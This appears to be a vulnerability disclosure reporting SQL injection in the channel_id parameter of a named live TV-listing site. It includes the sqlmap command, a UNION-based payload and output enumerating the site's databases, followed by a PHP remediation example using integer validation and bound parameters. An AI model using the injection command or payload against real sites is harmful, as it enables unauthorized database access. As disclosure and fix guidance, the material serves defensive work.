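Injection point: http://live.pps.tv/index.php/play/get_program_by_label?channel_id=1&channel_name=GDTV1&l_type=live&t_date=111111
The channel_id parameter is injectable.
This is a notification that the injection point exists; no further testing was done!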
python sqlmap.py -u "http://live.pps.tv/index.php/play/get_program_by_label?channel_id=--&channel_name=GDTV1&l_type=live&t_date=111111" -p "channel_id" --batch --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: channel_id
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: channel_id=--') UNION ALL SELECT CONCAT(0x7162747871,0x62676850436e4d694d4b,0x71666d6b71),NULL,NULL,NULL,NULL#&channel_name=GDTV1&l_type=live&t_date=111111
---
web application technology: PHP 5.3.15
back-end DBMS: MySQL 5
available databases [3]:
[*] epg
[*] information_schema
[*] test
Apply effective input filtering to fix the vulnerability.
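One way to implement the recommended fix in a PHP handler of this kind, as an added example that is not code from the affected site: channel_id is validated as an integer and every value is bound as a parameter. The `program` table, its five columns and the function name are hypothetical, and an in-memory SQLite database stands in for MySQL so the script runs offline.

```php
<?php
// Added example; table, columns and function name are hypothetical.
// SQLite in memory stands in for the MySQL back end.
// With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false so that
// parameters are bound server-side.

function get_program_by_label(PDO $db, array $query): array
{
    // 1. Allow-list validation: channel_id must be a positive integer.
    $channelId = filter_var(
        $query['channel_id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($channelId === false) {
        throw new InvalidArgumentException('channel_id must be a positive integer');
    }

    // 2. Bound parameters: values travel as data, never as part of the SQL text.
    $stmt = $db->prepare(
        'SELECT id, channel_id, channel_name, title, start_time
           FROM program
          WHERE channel_id = :channel_id AND channel_name = :channel_name'
    );
    $stmt->bindValue(':channel_id', $channelId, PDO::PARAM_INT);
    $stmt->bindValue(':channel_name', (string)($query['channel_name'] ?? ''), PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE program (id INTEGER PRIMARY KEY, channel_id INTEGER,
           channel_name TEXT, title TEXT, start_time TEXT)');
$db->exec("INSERT INTO program VALUES (1, 1, 'GDTV1', 'Evening News', '19:00')");

// A normal request returns the matching row.
$rows = get_program_by_label($db, ['channel_id' => '1', 'channel_name' => 'GDTV1']);
echo count($rows), " row(s) for channel 1\n";

// A value shaped like the reported payload is rejected before any query runs.
try {
    $bad = "--') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#";
    get_program_by_label($db, ['channel_id' => $bad, 'channel_name' => 'GDTV1']);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```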